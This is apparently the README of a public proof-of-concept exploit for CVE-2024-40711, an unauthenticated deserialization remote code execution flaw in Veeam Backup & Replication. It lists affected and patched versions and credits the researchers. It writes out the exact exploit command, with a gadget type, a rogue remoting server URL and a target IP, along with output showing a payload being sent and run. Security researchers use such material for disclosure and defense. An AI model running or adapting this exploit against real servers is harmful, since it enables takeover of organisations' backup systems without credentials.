Pre-Auth Exploit for CVE-2024-40711# CVE-2024-40711
Exploit for Veeam backup and Replication Pre-Auth Deserialization CVE-2024-40711
See our [blog post](https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/) for technical details
https://github.com/user-attachments/assets/24e8122c-3e84-408b-87a9-684a9aabeb70
# PoC in Action
```
CVE-2024-40711.exe -f binaryformatter -g Veeam -c http://192.168.201.1:8000/trigger --targetveeam 192.168.201.158
__ .__ ___________
__ _ _______ _/ |_ ____ | |_\__ ___/_____ _ _________
\ \/ \/ /\__ \\ __\/ ___\| | \| | / _ \ \/ \/ /\_ __ \
\ / / __ \| | \ \___| Y \ |( <_> ) / | | \/
\/\_/ (____ /__| \___ >___| /____| \____/ \/\_/ |__|
\/ \/ \/
(*) Veeam Backup & Replication Unauthenticated Remote Code Execution Exploit (CVE-2024-40711)
- Vulnerability Discovered by Florian Hauser (@frycos) at CODE WHITE Gmbh (@codewhitesec)
- Exploit Written by Sina Kheirkhah (@SinSinology) at watchTowr
- Thank you to my dear friend Soroush Dalili (@irsdl) for his help
CVEs: [CVE-2024-40711]
(*) Creating payload for 'cmd /c mspaint.exe'
(*) Wrapping payload in the CDbCryptoKeyInfo custom gadget
(*) Sending Remoting Trigger
(*) Started Rogue Server
HttpServerChannel for 'trigger' created:
http://192.168.201.1:8000/trigger
Press any key to exit ...
[*] Processing message for '/trigger' from 192.168.201.158:50592 ... sending payload!
```
# Florian Hauser
This vulnerability was found by Florian Hauser ([@frycos](https://x.com/frycos)) of CODE WHITE GmbH ([@codewhitesec](https://x.com/codewhitesec)). Make sure to follow his outstanding research, our role was to only recreate and develop the exploit for this issue.
# Affected Versions
| Version | Status |
|--------------------|----------------------------------------------------------------------------------------------|
| 12.2.0.334 | Fully patched. Not affected by the vulnerabilities in this blogpost. |
| 12.1.2.172 | Affected, but exploitation requires authentication. Low privilege users can execute arbitrary code. |
| 12.1.1.56 and earlier | Vulnerable to unauthenticated RCE. |
# Exploit authors
This exploit was written by [Sina Kheirkhah (@SinSinology)](https://x.com/SinSinology) of [watchTowr (@watchtowrcyber)](https://twitter.com/watchtowrcyber)
We'd also like to take the opportunity to thank [Soroush Dalili](https://x.com/irsdl) for his help with this exploit.
# Follow [watchTowr](https://watchTowr.com) Labs
For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team
- https://labs.watchtowr.com/
- https://twitter.com/watchtowrcyber
- https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/
- https://github.com/codewhitesec/RogueRemotingServer
- https://github.com/tyranid/ExploitRemotingService
- https://www.veeam.com/kb4649
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view